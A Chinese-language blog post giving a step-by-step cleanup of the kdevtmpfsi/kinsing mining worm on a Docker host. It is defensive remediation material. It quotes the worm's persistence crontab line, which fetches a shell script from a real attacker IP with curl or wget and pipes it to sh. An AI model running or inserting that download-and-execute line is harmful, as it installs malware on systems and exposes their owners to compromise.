Kdevtmpfsi 挖矿病毒处理方式

中毒线上状态:CPU占满90%+,引发线上服务处理异常缓慢等问题,从而导致业务异常。

处理方法:

1. 查看占用高的进程。

# top

 

2. 排序按下1,找到占用高CPU的进程后,Ctrl+z退出。

 

3. 查找对应的进程号。(可以使用pgrep来更加精确查询)

# ps -aux | grep kdevtmpfsi

# ps -aux | grep kinsing

 

4. 杀掉该进程。

# kill -9 12739

 

5. 查找文件及路径。

# find / -name kdevtmpfsi

# find / -name kinsing

 

6. 进入目录。

# cd /var/lib/docker/overlay2/ba8caaa61e6/diff/tmp/

 

7. 查看是否有相关文件。

# ls

 

8. 删除两个k文件。

# rm -rf kdevtmpfsi

# rm -rf kinsing

 

9. 新建两个文件,随意输入一些字符,按ESC输入:WQ保存。

kinsing为守护文件。

# vim kdevtmpfsi

# vim kinsing

 

10. 锁定文件,让病毒无法再次创建文件。

# chattr +i kdevtmpfsi

# chattr +i kinsing

设置成功后,显示如下:

----i--------e-- ./kinsing

----i--------e-- ./kdevtmpfsi

 

11. 显示文件属性,查看确认下是否锁定。

# lsattr

 

后续发现每个几分钟就会自动下载,采取以上方法都无法杀掉病毒。

进入php容器的工作目录(容器外)

# docker inspect [docker项目] | grep WorkDir

"WorkDir": "/var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/work"

# cd /var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/diff/tmp

该目录中同样有kdevtmpfsi, kinsing, libsystem.so 这三个文件

杀掉进程,然后删除文件,新建同名文件,chattr +i 加锁

# cd /var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/diff/var/spool/cron/crontabs

真正的脚本文件在此目录

# vim www-data

内容如下:

# DO NOT EDIT THIS FILE - edit the master and reinstall.

# (- installed on Tue Nov 17 05:34:10 2020)

# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

* * * * * curl http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

注释计划任务, 在容器外chattr +i 加锁

暂时解决,如有TP框架程序,需要将TP框架升级漏洞修复后彻底清除蠕虫。

 

扩展

1. 不定时可能会有如下进程,如果有则根据进程号杀掉即可。

# ps -ef|grep BjNVW

 

2. crontab -l 查看定时任务发现出现了如下莫名的定时任务,做了删除处理。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。

# crontab -l

#* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

 

3. 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)

# cd /var/spool/cron

点赞 1

暂无评论

发表评论

您的电子邮件地址不会被公开,必填项已用*标注。

相关推荐

Linux使用 history 查看命令执行时间方案

在linux下,有时我们需要知道有些命令执行后,运行大概花费了多少时间,这个时候我们就需要用到以下命令: # export HISTTIMEFORMAT="%Y-%m-%d %H:%M:%S " # history 所以,可以在某些命令执行完毕之后,打一些不痛不痒的命令,例如:# ls ,这样就可以在使用历 ...

Mysql 导出表结构(含列名、数据类型、字段备注注释)

MYSQL使用sql文件导出表结构(含列名、数据类型、字段备注注释)可以导出成Excel。 执行如下sql: SELECT COLUMN_NAME 列名, COLUMN_TYPE 数据类型, DATA_TYPE 字段类型, CHARACTER_MAXIMUM_LENGTH 长度, IS_NULLABLE 是否为空, COLUMN_DEFAULT 默认值, COLUMN_ ...

Docker 查看启动进程及日志命令

一、docker ps 查看正在运行的docker容器有哪些。   二、docker ps -a 查看所有docker容器,包括不在running状态的。   三、docker logs 参数 容器id 查看具体某一个容器的日志。 其中参数可选择的有: -f follow 表示实时显示日志 -t timestamp 表示 ...

运维职责和分类划分

运维前景 要说运维的前景还是很广阔的。可以这么说只要有互联网就会需要运维,试问下,现在的生活还能没有互联网吗?所以,就业前景还是可以的。就企业而言,运维属于技术职务,所以走的是P路线。什么是P路线呢?是互联网就个人职业规划的上升和晋级通道,P路线 ...

微信扫一扫,分享到朋友圈

Kdevtmpfsi 挖矿病毒处理方式